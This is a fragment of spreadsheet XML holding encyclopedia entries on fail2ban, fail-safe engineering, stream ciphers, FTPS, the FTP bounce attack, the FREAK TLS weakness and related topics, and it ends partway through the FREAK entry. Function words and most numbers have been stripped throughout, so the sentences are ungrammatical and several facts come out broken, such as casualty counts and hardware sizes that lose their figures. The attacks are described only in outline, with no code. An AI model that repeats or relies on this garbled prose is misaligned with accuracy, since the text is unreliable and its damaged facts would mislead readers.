    <t>fail2ban intrusion prevention software framework. written python programming language, designed prevent brute-force attacks. able posix systems interface packet-control system firewall installed locally, iptables wrapper. functionality fail2ban operates monitoring files (e.g. /var/log/auth.log, /var/log/apache/access.log, etc.) selected entries running scripts based them. most commonly used block selected addresses belong hosts trying breach system's security. host address makes many login attempts performs unwanted action within time frame defined administrator. includes support ipv4 ipv6. optionally longer bans custom-configure "recidivist" abusers keep coming back. fail2ban typically unban blocked host within certain period, "lock out" genuine connections temporarily misconfigured. however, unban time several minutes usually enough stop network connection flooded malicious connections, well reducing likelihood successful dictionary attack. fail2ban perform multiple actions whenever abusive address detected: update netfilter/iptables firewall rules, wrapper's hosts.deny table, reject abuser's address; email notifications; user-defined action carried python script. standard configuration ships filters apache, lighttpd, sshd, vsftpd, qmail, postfix courier mail server. filters defined python regexes, conveniently customized administrator familiar regular expressions. combination filter action known "jail" causes malicious host blocked accessing specified network services. well examples distributed software, "jail" created network-facing process creates file access. fail2ban similar denyhosts [...] unlike denyhosts focuses ssh, fail2ban configured monitor service writes login attempts file, instead using /etc/hosts.deny block addresses/hosts, fail2ban netfilter/iptables wrappers /etc/hosts.deny. integrations fail2ban integrated many apis, including blocklist.de abuseipdb. shortcomings fail2ban fails protect distributed brute-force attack. however, tools exist distribute ban/unban events among servers using zmq. there interaction application-specific apis/agis. also ipban, log-based intrusion-prevention security tool windows linux denyhosts, log-based intrusion-prevention security tool stockade, rate-limiting approach spam mitigation. ossec, open-source host-based intrusion-detection system. references external links official website debian popularity contest results fail2ban</t>
  </si>
  <si>
    <t>Fail-stop</t>
  </si>
  <si>
    <t>fail-stop subset computer language semantics original, except case exceptional condition arises. fail-stop subset must report exceptional condition whenever superset language reports one, additionally report exceptional condition cases. fail-stop languages often used computer systems correctness important, since easier make systems fail-fast. example, operator many programming languages associative possibility floating-point overflow. repairing languages fail fast commonly assumed properties hold makes much easier write verify correct code. examples many widely used programming languages code might reduce bank account value deposited amount account value large, causing overflowed value assigned new_bank_account_value. fail-stop language treats overflow exceptional condition, either correct, terminate exceptional condition. also exception handling fail-safe fault-tolerant bottom type</t>
  </si>
  <si>
    <t>Fail-silent system</t>
  </si>
  <si>
    <t>fail-silent system type system either provides correct service, provides service (becomes silent). also design contract fail-fast fail-safe fail-stop fault tolerance references</t>
  </si>
  <si>
    <t>Fail-safe</t>
  </si>
  <si>
    <t>engineering, fail-safe design feature practice event specific type failure, inherently responds cause minimal harm equipment, environment people. unlike inherent safety particular hazard, system "fail-safe" mean failure impossible improbable, rather system's design prevents mitigates unsafe consequences system's failure. that "fail-safe" system fails, remains least safe failure. since many types failure possible, failure mode effects analysis used examine failure situations recommend safety design procedures. some systems never made fail-safe, continuous availability needed. redundancy, fault tolerance, contingency plans used situations (e.g. multiple independently controlled fuel-fed engines). examples mechanical physical examples include: roller-shutter fire doors activated building alarm systems local smoke detectors must close automatically signaled regardless power. case power outage coiling fire door need close, must capable automatic closing given signal building alarm systems smoke detectors. temperature-sensitive fusible link employed hold fire doors open gravity closing spring. case fire, link melts releases doors, close. some airport baggage carts require person hold given cart's handbrake switch times; handbrake switch released, brake activate, assuming portions braking system working properly, cart stop. handbrake-holding requirement thus operates according principles "fail-safety" contributes (but necessarily ensure) fail-security system. this example dead man's switch. lawnmowers snow blowers hand-closed lever must held times. released, stops blade's rotor's rotation. this also functions dead man's switch. brakes railway trains brakes trucks. brakes held "off" position pressure created brake system. should brake line split, carriage become de-coupled, pressure lost brakes applied, springs case trucks, local reservoir trains. impossible drive truck serious leak brake system. (trucks also employ wags indicate pressure.) motorized gates case power outage gate pushed open hand crank required. however, would allow virtually anyone gate, fail-secure design used: power outage, gate opened hand crank usually kept safe area lock key. when gate provides vehicle access homes, fail-safe design used, door opens allow fire department access. safety valves various devices operate fluids fuses safety valves fail-safe mechanisms. railway semaphore signal specially designed that, cable controlling signal break, returns "danger" position, preventing trains passing inoperative signal. isolation valves, control valves, used example systems containing hazardous substances, designed close upon loss power, example spring force. this known fail-closed upon loss power. elevator brakes held brake pads tension elevator cable. cable breaks, tension lost brakes latch rails shaft, elevator cabin fall. vehicle conditioning defrost controls require vacuum diverter damper operation functions except defrost. vacuum fails, defrost still available. electrical electronic examples include: many devices protected short circuit fuses, circuit breakers, current limiting circuits. electrical interruption overload conditions prevent damage destruction wiring circuit devices overheating. avionics using redundant systems perform computation using three different systems. different results indicate fault system. drive-by-wire fly-by-wire controls accelerator position sensor typically potentiometers read opposite directions, moving control result reading becoming higher, generally equally lower. mismatches readings indicates fault system, often deduce readings faulty. traffic light controllers conflict monitor unit detect faults conflicting signals switch intersection flashing error signal, rather displaying potentially dangerous conflicting signals, e.g. showing green directions. automatic protection programs and/or processing systems computer hardware software failure detected computer system. classic example watchdog timer. fail-safe (computer). control operation function prevents improper system functioning catastrophic degradation event circuit malfunction operator error; example, failsafe track circuit used control railway block signals. fact flashing amber permissive solid amber many railway lines sign failsafe, relay, working, revert restrictive setting. iron pellet ballast bathyscaphe dropped allow submarine ascend. ballast held place electromagnets. electrical power fails, ballast released, submarine ascends safety. many nuclear reactor designs neutron absorbing control rods suspended electromagnets. power fails, drop gravity core shut chain reaction seconds absorbing neutrons needed fission continue. industrial automation, alarm circuits usually "normally closed". this ensures case wire break alarm triggered. circuit normally open, wire failure would undetected, blocking actual alarm signals. analog sensors modulating actuators usually installed wired circuit failure results out-of-bound reading current loop. example, potentiometer indicating pedal position might travel full range, cable break short results 100% reading. control systems, critically important signals carried complementary pair wires (&lt;signal&gt; &lt;not_signal&gt;). only states signals opposite (one high, low) valid. high control system knows something wrong sensor connecting wiring. simple failure modes (dead sensor, unplugged wires) thereby detected. example would control system reading normally open (no) normally closed (nc) poles spdt selector switch common, checking coherency reacting input. hvac control systems, actuators control dampers valves fail-safe, example, prevent coils freezing rooms overheating. older pneumatic actuators inherently fail-safe pressure internal diaphragm failed, built-in spring would push actuator home position course home position needed "safe" position. newer electrical electronic actuators need additional components (springs capacitors) automatically drive actuator home position upon loss electrical power. programmable logic controllers (plcs). make fail-safe system require energization stop drives associated. example, usually, emergency stop normally closed contact. event power failure would remove power directly coil also input. hence, fail-safe system. voltage regulator fails, destroy connected equipment. crowbar (circuit) prevents damage short-circuiting power supply soon detects overvoltage. procedural safety well physical devices systems fail-safe procedures created procedure carried carried incorrectly dangerous action results. example: spacecraft trajectory during early apollo program missions moon, spacecraft free return trajectory engines failed lunar orbit insertion, craft would safely coasted back earth. pilot aircraft landing aircraft carrier increases throttle full power touchdown. arresting wires fail capture aircraft, able take again; example fail-safe practice. railway signalling signals active train required kept 'danger' position. default position every controlled absolute signal therefore "danger", therefore positive action setting signals "clear" required train pass. this practice also ensures that, case fault signalling system, incapacitated signalman, unexpected entry train, train never shown erroneous "clear" signal. railroad engineers instructed railway signal showing confusing, contradictory unfamiliar aspect (for example colour light signal suffered electrical failure showing light all) must treated showing "danger". way, driver contributes fail-safety system. other terminology fail-safe (foolproof) devices also known poka-yoke devices. poka-yoke, japanese term, coined shigeo shingo, quality expert. "safe fail" refers civil engineering designs room river project netherlands thames estuary 2100 plan incorporate flexible adaptation strategies climate change adaptation provide for, limit, damage, severe events 500-year floods occur. fail safe fail secure fail-safe fail-secure distinct concepts. fail-safe means device endanger lives property fails. fail-secure, also called fail-closed, means access data fall wrong hands security failure. sometimes approaches suggest opposite solutions. example, building catches fire, fail-safe systems would unlock doors ensure quick escape allow firefighters inside, fail-secure would lock doors prevent unauthorized access building. opposite fail-closed called fail-open. fail active operational fail active operational installed systems high degree redundancy single failure part system tolerated (fail active operational) second failure detected point system turn (uncouple, fail passive). accomplishing three identical systems installed, control logic detects discrepancies. example many aircraft systems, among inertial navigation systems pitot tubes. failsafe point during cold war, "failsafe point" term used point return american strategic command nuclear bombers, outside soviet airspace. event receiving attack order, bombers required linger failsafe point wait second confirming order; received, would bombs proceed further. design prevent single failure american command system causing nuclear war. this sense term entered american popular lexicon publishing 1962 novel fail-safe. (other nuclear command control systems used opposite scheme, fail-deadly, requires continuous regular proof enemy first-strike attack occurred prevent launching nuclear strike.) also fail-fast control theory dead man's switch eia-485 elegant degradation failing badly fail-deadly fault tolerance 61508 interlock safe-life design safety engineering references</t>
  </si>
  <si>
    <t>Telehack</t>
  </si>
  <si>
    <t>telehack simulation stylized arpanet/usenet, circa 1985-1990. full multi-user simulation, including 26,600+ simulated hosts early net, thousands files era, collection adventure games, working basic interpreter library programs run, simulated historical users, more. telehack interactive virtual museum allows internet like 1990s, young hackers browsing different bulletin board systems shell accounts. learn exactly hacked safe simulated environment well view real documents saved bbses thanks textfiles.com. references further reading baio, andy (june 2011) "playable archaeology: interview telehack's anonymous creator" hoid (may 2020) "hack like it's 1987 introduction telehack retro game)" external links telehack</t>
  </si>
  <si>
    <t>Stream cipher</t>
  </si>
  <si>
    <t>stream cipher symmetric cipher plaintext digits combined pseudorandom cipher digit stream (keystream). stream cipher, plaintext digit encrypted time corresponding digit keystream, give digit ciphertext stream. since encryption digit dependent current state cipher, also known state cipher. practice, digit typically combining operation exclusive-or (xor). pseudorandom keystream typically generated serially random seed value using digital shift registers. seed value serves cryptographic decrypting ciphertext stream. stream ciphers represent different approach symmetric encryption block ciphers. block ciphers operate large blocks digits fixed, unvarying transformation. this distinction always clear-cut: modes operation, block cipher primitive used acts effectively stream cipher. stream ciphers typically execute higher speed block ciphers lower hardware complexity. however, stream ciphers susceptible security breaches (see stream cipher attacks); example, starting state (seed) used twice. loose inspiration one-time stream ciphers viewed approximating action proven unbreakable cipher, one-time (otp). one-time uses keystream completely random digits. keystream combined plaintext digits time form ciphertext. this system proved secure claude shannon 1949. however, keystream must generated completely random least length plaintext cannot used once. this makes system cumbersome implement many practical applications, result one-time widely used, except critical applications. generation, distribution management critical applications. stream cipher makes much smaller convenient bits. based key, generates pseudorandom keystream combined plaintext digits similar fashion one-time pad. however, comes cost. keystream pseudorandom truly random. proof security associated one-time longer holds. quite possible stream cipher completely insecure. types stream cipher generates successive elements keystream based internal state. this state updated essentially ways: state changes independently plaintext ciphertext messages, cipher classified synchronous stream cipher. contrast, self-synchronising stream ciphers update state based previous ciphertext digits. synchronous stream ciphers synchronous stream cipher stream pseudorandom digits generated independently plaintext ciphertext messages, combined plaintext encrypt) ciphertext decrypt). common form, binary digits used (bits), keystream combined plaintext using exclusive operation (xor). this termed binary additive stream cipher. synchronous stream cipher, sender receiver must exactly step decryption successful. digits added removed message transmission, synchronisation lost. restore synchronisation, various offsets tried systematically obtain correct decryption. another approach ciphertext markers regular points output. however, digit corrupted transmission, rather added lost, single digit plaintext affected error propagate parts message. this property useful transmission error rate high; however, makes less likely error would detected without mechanisms. moreover, property, synchronous stream ciphers susceptible active attacks: attacker change digit ciphertext, might able make predictable changes corresponding plaintext bit; example, flipping ciphertext causes flipped plaintext. self-synchronizing stream ciphers another approach uses several previous ciphertext digits compute keystream. such schemes known self-synchronizing stream ciphers, asynchronous stream ciphers ciphertext autokey (ctak). idea self-synchronization patented 1946 advantage receiver automatically synchronise keystream generator receiving ciphertext digits, making easier recover digits dropped added message stream. single-digit errors limited effect, affecting plaintext digits. example self-synchronising stream cipher block cipher cipher feedback (cfb) mode. based linear-feedback shift registers binary stream ciphers often constructed using linear-feedback shift registers (lfsrs) easily implemented hardware readily analysed mathematically. lfsrs own, however, insufficient provide good security. various schemes proposed increase security lfsrs. non-linear combining functions because lfsrs inherently linear, technique removing linearity feed outputs several parallel lfsrs non-linear boolean function form combination generator. various properties combining function critical ensuring security resultant scheme, example, order avoid correlation attacks. clock-controlled generators normally lfsrs stepped regularly. approach introducing non-linearity lfsr clocked irregularly, controlled output second lfsr. such generators include stop-and-go generator, alternating step generator shrinking generator. alternating step generator comprises three lfsrs, call lfsr0, lfsr1 lfsr2 convenience. output registers decides used; instance, lfsr2 outputs lfsr0 clocked, outputs lfsr1 clocked instead. output exclusive last produced lfsr0 lfsr1. initial state three lfsrs key. stop-and-go generator (beth piper, 1984) consists lfsrs. lfsr clocked output second otherwise repeats previous output. this output versions) combined output third lfsr clocked regular rate. shrinking generator takes different approach. lfsrs used, clocked regularly. output first lfsr output second lfsr becomes output generator. first lfsr outputs however, output second discarded, output generator. this mechanism suffers timing attacks second generator, since speed output variable manner depends second generator's state. this alleviated buffering output. filter generator another approach improving security lfsr pass entire state single lfsr non-linear filtering function. other designs instead linear driving device, nonlinear update function. example, klimov shamir proposed triangular functions (t-functions) single cycle n-bit words. security stream cipher secure, keystream must large period, must impossible recover cipher's internal state keystream. cryptographers also demand keystream free even subtle biases would attackers distinguish stream random noise, free detectable relationships keystreams correspond related keys related cryptographic nonces. that true keys (there weak keys), even attacker know choose plaintext ciphertext. attacks cryptography, stream cipher attacks certificational necessarily practical ways break cipher indicate cipher might weaknesses. securely using secure synchronous stream cipher requires never reuse keystream twice. that generally means different nonce must supplied invocation cipher. application designers must also recognize stream ciphers provide authenticity privacy: encrypted messages still modified transit. short periods stream ciphers practical concern. example, 64-bit block ciphers like used generate keystream output feedback (ofb) mode. however, using full feedback, resulting stream period around blocks average; many applications, period low. example, encryption performed rate megabytes second, stream period blocks repeat half hour.some applications using stream cipher attackable weaknesses rc4's setup routine; applications either avoid make sure keys unique ideally unrelated (such generated well-seeded csprng cryptographic hash function) first bytes keystream discarded. elements stream ciphers often much simpler understand block ciphers thus less likely hide accidental malicious weaknesses. usage stream ciphers often used speed simplicity implementation hardware, applications plaintext comes quantities unknowable length like secure wireless connection. block cipher (not operating stream cipher mode) used type application, designer would need choose either transmission efficiency implementation complexity, since block ciphers cannot directly work blocks shorter block size. example, 128-bit block cipher received separate 32-bit bursts plaintext, three quarters data transmitted would padding. block ciphers must used ciphertext stealing residual block termination mode avoid padding, stream ciphers eliminate issue naturally operating smallest unit transmitted (usually bytes). another advantage stream ciphers military cryptography cipher stream generated separate subject strict security measures devices radio set, perform operation part function. latter device designed used less stringent environments. chacha becoming widely used stream cipher software; others include: rc4, a5/1, a5/2, chameleon, fish, helix, isaac, mugi, panama, phelix, pike, salsa20, seal, sober, sober-128, wake. comparison trivia united states national security agency documents sometimes term combiner-type algorithms, referring algorithms function combine pseudorandom number generator (prng) plaintext stream. also estream linear-feedback shift register (lfsr) nonlinear-feedback shift register (nlfsr) notes references matt robshaw, stream ciphers technical report tr-701, version 2.0, laboratories, 1995 (pdf). beth, thomas; piper, fred (1985). stop generator (pdf). eurocrypt '84. 88–92. doi:10.1007/3-540-39757-4_9. christof paar, pelzl, "stream ciphers", chapter "understanding cryptography, textbook students practitioners". (companion site contains online cryptography course covers stream ciphers lfsr), springer, 2009. external links technical report stream cipher operation. cryptanalysis design stream ciphers (thesis hongjun wu). analysis lightweight stream ciphers (thesis fischer).</t>
  </si>
  <si>
    <t>Factory reset</t>
  </si>
  <si>
    <t>factory reset, also known hard reset master reset, software restore electronic device original system state erasing information stored device. keyboard input button factory reset used restore device original manufacturer settings. doing effectively erase data, settings, applications previously device. this often done issue device, could also done restore device original settings. such electronic devices include smartphones. since factory reset entails deleting information stored device, essentially concept reformatting hard drive. pre-installed applications data card's storage card (such microsd card) erased. factory reset effectively destroys data stored unit. factory resets many chronic performance issues (i.e. freezing), remove device's operating system. factory resets also used prepare device sale, refurbishing, destruction, donation transfers ownership removing personal data configurations associated previous owner. examples factory resets achieved variety ways depending electronic device. devices, could done going device's service menu. other devices require complete re-installation software. following section lists common electronic devices reset factory settings. computer factory resets restore computer computer's original operating system delete user data stored computer. microsoft's windows windows apple's macos options this. android devices, factory data reset option settings appear erase device's data reset settings. this method typically used device technical problem cannot fixed using methods, owner wants remove personal data selling, giving away, returning disposing device. after performing study, avast! reported data recoverable using forensics software fairly generic publicly available. samsung smartphones, factory reset operation affect knox flag. such, reset device original factory settings return device state compatible manufacturer's warranty. data card microsd card erased. many devices restored factory settings, like televisions, units tablet computers. many electronic devices menu tools settings called service menu, commonly includes tool performs factory reset. this tool common devices displays, television sets computer monitors. these menus usually accessed sequence button presses. game cartridges, particularly ones designed nintendo handhelds maintain save data, feature factory reset option instantly delete data cartridge, initiated either selecting particular setting options menu inputting particular button combination startup. also hardware reset reboot (computing) troubleshooting references</t>
  </si>
  <si>
    <t>Stress corrosion cracking</t>
  </si>
  <si>
    <t>stress corrosion cracking (scc) growth crack formation corrosive environment. lead unexpected sudden failure normally ductile metal alloys subjected tensile stress, especially elevated temperature. highly chemically specific certain alloys likely undergo exposed small number chemical environments. chemical environment causes given alloy often mildly corrosive metal. hence, metal parts severe appear bright shiny, filled microscopic cracks. this factor makes common undetected prior failure. often progresses rapidly, common among alloys pure metals. specific environment crucial importance, small concentrations certain highly active chemicals needed produce catastrophic cracking, often leading devastating unexpected failure.the stresses result crevice loads stress concentration, caused type assembly residual stresses fabrication (e.g. cold working); residual stresses relieved annealing surface treatments. unexpected premature failure chemical process equipment, example, stress corrosion cracking constitutes serious hazard terms safety personnel, operating facilities environment. weakening reliability types equipment, failures also adversely affect productivity profitability. mechanisms stress corrosion cracking mainly affects metals metallic alloys. comparable effect also known environmental stress cracking also affects materials polymers, ceramics glass. metals lower lower applied redox potential facilitate evolution enrichment hydrogen process scc, thus increasing intensity. certain austenitic stainless steels aluminium alloys crack presence chlorides. this limits usefulness austenitic stainless steel containing water higher parts million content chlorides temperatures (122 °f); mild steel cracks presence alkali (e.g. boiler cracking caustic stress corrosion cracking) nitrates; copper alloys crack ammoniacal solutions (season cracking); high-tensile steels known crack unexpectedly brittle manner whole variety aqueous environments, especially chlorides present.with possible exception latter, special example hydrogen cracking, others display phenomenon subcritical crack growth, i.e. small surface flaws propagate (usually smoothly) conditions fracture mechanics predicts failure occur. that presence corrodent, cracks develop propagate well critical stress intensity factor {\displaystyle k_{\mathrm {ic} subcritical value stress intensity, designated {\displaystyle k_{\mathrm {iscc} less {\displaystyle k_{\mathrm {ic} polymers similar process (environmental stress cracking) occurs polymers, products exposed specific solvents aggressive chemicals acids alkalis. metals, attack confined specific polymers particular chemicals. thus polycarbonate sensitive attack alkalis, acids. hand, polyesters readily degraded acids, likely failure mechanism. polymers susceptible environmental stress cracking attacking agents necessarily degrade materials chemically. nylon sensitive degradation acids, process known hydrolysis, nylon mouldings crack attacked strong acids. example, fracture surface fuel connector showed progressive growth crack acid attack (ch) final cusp polymer. case failure caused hydrolysis polymer contact sulfuric acid leaking battery. degradation reaction reverse synthesis reaction polymer: cracks formed many different elastomers ozone attack, another form polymers. tiny traces attack double bonds rubber chains, natural rubber, styrene-butadiene rubber, nitrile butadiene rubber sensitive degradation. ozone cracks form products tension, critical strain small. cracks always oriented right angles strain axis, form around circumference rubber tube bent over. such cracks dangerous occur fuel pipes cracks grow outside exposed surfaces bore pipe, fuel leakage fire follow. ozone cracking prevented adding anti-ozonants rubber vulcanization. ozone cracks commonly seen automobile tire sidewalls, seen rarely thanks additives. hand, problem recur unprotected products rubber tubing seals. ceramics this effect significantly less common ceramics typically resilient chemical attack. although phase changes common ceramics stress usually result toughening rather failure (see zirconium dioxide). recent studies shown driving force toughening mechanism also enhance oxidation reduced cerium oxide, resulting slow crack growth spontaneous failure dense ceramic bodies. glass subcritical crack propagation glasses falls three regions. region velocity crack propagation increases ambient humidity stress-enhanced chemical reaction glass water. region crack propagation velocity diffusion controlled dependent rate chemical reactants transported crack. region iii, crack propagation independent environment, reached critical stress intensity. chemicals water, like ammonia, induce subcritical crack propagation silica glass, must electron donor site proton donor site. prevention compressive residual stresses imparted laser peening precisely controlled location intensity applied mitigate sharp transitions tensile regions. laser peening imparts deep compressive residual stresses order times deeper conventional shot peening, making significantly beneficial preventing scc. laser peening widely used aerospace power generation industries fired turbine engines. notable failures 32-inch diameter transmission pipeline, north natchitoches, louisiana, belonging tennessee pipeline exploded burned march 1965, killing people. least others injured, homes feet rupture destroyed. caused catastrophic collapse silver bridge december 1967, eyebar suspension bridge across ohio river point pleasant, west virginia, suddenly failed. main chain joint failed entire structure fell river, killing people traveling vehicles across bridge. rust eyebar joint caused stress corrosion crack, went critical result high bridge loading temperature. failure exacerbated high level residual stress eyebar. disaster nationwide reappraisal bridges. also forensic chemistry forensic application study chemistry forensic engineering investigation failures associated legal intervention forensic materials engineering forensic polymer engineering fracture mechanics field mechanics studies propagation cracks materials environmental stress cracking brittle failure thermoplastic polymers environmental stress fracture generic name premature failure influence tensile stresses harmful environments hydrogen embrittlement reduction ductility metal exposed hydrogen ozone cracking cracks many different elastomers ozone attack polymer degradation alteration polymer properties influence environmental factors season cracking form stress-corrosion cracking brass cartridge cases sulfide stress cracking form hydrogen embrittlement hydrogen sulfide references notes sources</t>
  </si>
  <si>
    <t>Stress wave communication</t>
  </si>
  <si>
    <t>stress wave communication technique sending receiving messages using host structure transmission medium. conventional modulation methods amplitude-shift keying (ask), frequency-shift keying (fsk), phase-shift keying (psk), quadrature amplitude modulation (qam), pulse-position modulation (ppm) orthogonal frequency-division multiplexing (ofdm) could leveraged stress wave communication. challenge stress wave carrier communication severe signal distortions multipath channel dispersion. compared communication techniques, reliable communication special applications, within concrete structures, well drilling string, pipeline structures references</t>
  </si>
  <si>
    <t>FTPS</t>
  </si>
  <si>
    <t>ftps (also known ftp-ssl, secure) extension commonly used file transfer protocol (ftp) adds support transport layer security (tls) and, formerly, secure sockets layer (ssl, prohibited rfc7568) cryptographic protocols. ftps confused file transfer protocol (sftp), secure file transfer subsystem secure shell (ssh) protocol compatible. also different ssh, practice tunneling connection. background file transfer protocol drafted 1971 scientific research network, arpanet. access arpanet time limited small number military sites universities narrow community users could operate without data security privacy requirements within protocol. arpanet gave nsfnet internet, broader population potentially access data traversed increasingly longer paths client server. opportunity unauthorized third parties eavesdrop data transmissions increased proportionally. 1994, internet browser company netscape developed released application layer wrapper, secure sockets layer. this protocol enabled applications communicate across network private secure fashion, discouraging eavesdropping, tampering, message forgery. while could security protocol uses reliable connections, tcp, commonly used netscape http form https. protocol eventually applied ftp, draft request comments (rfc) published late 1996. official iana port registered shortly thereafter. however, finalized 2005. methods invoking security separate methods developed invoke client security clients: implicit explicit. while implicit method requires transport layer security established beginning connection, turn breaks compatibility non-ftps-aware clients servers, explicit method uses standard protocol commands replies order upgrade plain text connection encrypted one, allowing single control port used serving ftps-aware non-ftps-aware clients. implicit negotiation supported implicit ftps configurations. client immediately expected challenge ftps server clienthello message. message received ftps server, server drop connection. order maintain compatibility existing non-ftps-aware clients, implicit ftps expected listen iana well known port 990/tcp ftps control channel, port 989/tcp ftps data channel. this allowed administrators retain legacy-compatible services original 21/tcp control channel. note implicit negotiation defined 4217. such, considered earlier, deprecated method negotiating tls/ssl ftp. explicit explicit mode (also known ftpes), ftps client must "explicitly request" security ftps server step mutually agreed encryption method. client request security, ftps server either allow client continue insecure mode refuse connection. mechanism negotiating authentication security added 2228, included command auth. while explicitly define required security mechanisms, e.g. tls, require ftps client challenge ftps server mutually known mechanism. ftps client challenges ftps server unknown security mechanism, ftps server respond auth command error code (not supported). clients determine mechanisms supported querying ftps server feat command, although servers necessarily required honest disclosing levels security support. common methods invoking ftps security included auth auth ssl. explicit method defined 4217. later versions document, ftps compliance required clients always negotiate using auth method. transport layer security (tls)/secure socket layer (ssl) general support ftps includes full support cryptographic protocols, including server-side public authentication certificates client-side authorization certificates. also supports compatible ciphers, including aes, rc4, rc2, triple des, des. supports hash functions sha, md5, md4, md2. scope implicit mode, entire ftps session encrypted. explicit mode differs client full control areas connection encrypted. enabling disabling encryption ftps control channel ftps data channel occur time. restriction comes ftps server, ability deny commands based server encryption policy. secure command channel secure command channel mode entered issue either auth auth commands. after time, command control ftps client server assumed encrypted. generally advised enter state prior user authentication authorization order avoid eavesdropping user name password data third parties. secure data channel secure data channel entered issue prot command. enabled default auth command issued. after time, data channel communication ftps client server assumed encrypted. ftps client exit secure data channel mode time issuing (clear data channel) command. reasons disable encryption advantageous data channel encryption performing transfers following scenarios: files transferred non-sensitive nature, making encryption unnecessary, files transferred already encrypted file level passing encrypted vpn, making encryption redundant, available encryption modes meet desired level encryption. this common older ftps clients servers limited 40-bit previous united states high-encryption export laws.it advantageous control channel encryption following scenarios: ftps client server reside behind network firewall network address translation (nat) device. (see firewall incompatibilities below.) repeated auth ccc/cdc commands anonymous clients within session. such behavior used resource-based denial service attack tls/ssl session must regenerated time, using server processor time. certificates much like https, ftps servers must provide public certificate. these certificates requested created using tools openssl. when certificates signed trusted certificate authority, provides assurance client connected requested server, avoiding man-in-the-middle attack. certificate signed trusted self-signed certificate), ftps client generate warning stating certificate valid. client choose accept certificate reject connection. this contrast file transfer protocol (sftp), present signed certificates, instead relies out-of-band authentication public keys. firewall incompatibilities because uses dynamic secondary port (for data channels), many firewalls designed snoop protocol control messages order determine secondary data connections need allow. however, control connection encrypted using tls/ssl, firewall cannot determine port number data connection negotiated client server. therefore, many firewalled networks, ftps deployment fail unencrypted deployment work. this problem solved limited range ports data configuring firewall open ports. also notes external links overview ftps, lists clients, servers curl-loader open-source ftps loading/testing tool</t>
  </si>
  <si>
    <t>FTP bounce attack</t>
  </si>
  <si>
    <t>bounce attack exploit protocol whereby attacker able port command request access ports indirectly victim machine, serves proxy request, similar open mail relay using smtp.this technique used port scan hosts discreetly, potentially bypass network access-control list access specific ports attacker cannot access direct connection, example nmap port scanner.nearly modern server programs configured default refuse port commands would connect host originating host, thwarting bounce attacks. also confused deputy problem references external links cert advisory bounce attack cert article bounce attack original posting describing attack</t>
  </si>
  <si>
    <t>FROSTBURG</t>
  </si>
  <si>
    <t>frostburg connection machine (cm-5) massively parallel supercomputer used national security agency (nsa) perform higher-level mathematical calculations. cm-5 built thinking machines corporation, based cambridge, massachusetts, cost us$25 million. system installed 1991, operated 1997. first massively parallel processing computer bought nsa, originally containing processing nodes. system upgraded 1993 another nodes, total nodes. system total billion 32-bit words terabytes) storage, billion words gigabytes) memory, could perform theoretical maximum 65.5 gigaflops. operating system cmost based unix, optimized parallel processing. frostburg display national cryptologic museum. also harvest cryptanalytic computer references external links another photograph frostburg declan mccullagh</t>
  </si>
  <si>
    <t>StrongSwan</t>
  </si>
  <si>
    <t>strongswan multiplatform ipsec implementation. focus project authentication mechanisms using x.509 public certificates optional storage private keys certificates smartcards pkcs#11 interface 2.0. overview project maintained andreas steffen professor emeritus security communications university applied sciences rapperswil, switzerland. descendant frees/wan project, strongswan continues released license. supports certificate revocation lists online certificate status protocol (ocsp). unique feature x.509 attribute certificates implement access control schemes based group memberships. strongswan interoperates ipsec implementations, including various microsoft windows macos clients. current version strongswan fully implements internet exchange (ikev2) protocol defined 7296. features strongswan supports ikev1 fully implements ikev2. ikev1 ikev2 features strongswan offers plugins, enhancing functionality. user choose among three crypto libraries (legacy [non-us] frees/wan, openssl, gcrypt). using openssl plugin, strongswan supports elliptic curve cryptography (ecdh groups ecdsa certificates signatures) ikev2 ikev1, interoperability microsoft's suite implementation vista, server 2008, etc. possible. automatic assignment virtual addresses clients several address pools using either ikev1 modeconfig ikev2 configuration payload. pools either volatile (i.e. ram-based) stored sqlite mysql database (with configurable lease-times). ipsec pool command line utility allows management address pools configuration attributes like internal nbns servers. ikev2 features ikev2 daemon inherently multi-threaded threads default). ikev2 daemon comes high-availability option based cluster currently cluster hosts active load-sharing host take ikev2 states without rekeying host fails. following authentication methods supported: including management multiple [u]sim cards, md5, mschapv2, gtc, tls, ttls. eap-mschapv2 authentication based user passwords eap-tls user certificates interoperable windows agile client. eap-radius plugin relays packets multiple servers (e.g. freeradius active directory). support 5998 eap-only authentication conjunction strong mutual authentication methods like e.g. eap-tls. support 4739 ikev2 multiple authentication exchanges. support 5685 ikev2 redirection. support 4555 mobility multihoming protocol (mobike) allows dynamic changes address and/or network interface without ikev2 rekeying. mobike also supported windows agile client. strongswan ikev2 networkmanager applet supports eap, x.509 certificate pkcs#11 smartcard based authentication. assigned servers automatically installed removed /etc/resolv.conf. support trusted network connect (tnc). strongswan client client strongswan gateway policy enforcement point (pep) optionally co-located server. following interfaces supported: if-imc 1.2, if-imv 1.2, if-pep 1.1, if-tnccs 1.1, if-tnccs (rfc 5793 pb-tnc), if-m (rfc 5792 pa-tnc), if-map 2.0. ikev2 daemon fully ported android operating system including integration android applet. also ported maemo, freebsd macos operating systems. simulation environment focus strongswan project lies strong authentication means x.509 certificates, well optional safe storage private keys smart cards using standardized pkcs#11 interface, strongswan certificate check lists on-line certificate status protocol (ocsp). important capability x.509 certificate attributes, permits utilize complex access control mechanisms basis group memberships. strongswan comes simulation environment based kvm. network eight virtual hosts allows user enact multitude site-to-site roadwarrior scenarios. also libreswan openswan references external links official website strongswan github strongswan documentation</t>
  </si>
  <si>
    <t>FREAK</t>
  </si>
  <si>
    <t>freak ("factoring export keys") security exploit cryptographic weakness ssl/tls protocols introduced decades earlier compliance u.s. cryptography export regulations. these involved limiting exportable software public pairs moduli bits less (so-called rsa_export keys), intention allowing broken easily national security agency (nsa), organizations lesser computing resources. however, early 2010s, increases computing power meant could broken anyone access relatively modest computing resources using well-known number field sieve algorithm, using little $100 cloud computing services. combined ability man-in-the-middle attack manipulate initial cipher suite negotiation endpoints connection fact finished hash depended master secret, meant man-in-the-middle attack modest amount computation could break security website allowed 512-bit export-grade keys. while exploit discovered 2015, underlying vulnerabilities present many years, dating back 1990s. vulnerability flaw found researchers imdea software institute, inria microsoft research. freak attack openssl identifier cve-2015-0204.vulnerable software devices included apple's safari browser, default browser google's android operating system, microsoft's internet explorer, openssl. microsoft also stated schannel implementation transport-layer encryption vulnerable version freak attack versions microsoft windows. microsoft's vulnerability schannel cve-2015-1637. apple's vulnerability secure transport cve-2015-1067.sites affected vulnerability included federal government websites fbi.gov, whitehouse.gov nsa.gov, around https-using websites tested security group shown vulnerable exploit. based geolocation analysis using ip2location lite, vulnerable servers located us.press reports exploit described effects "potentially catastrophic" "unintended consequence" government efforts control spread cryptographic technology.as march 2015, vendors process releasing 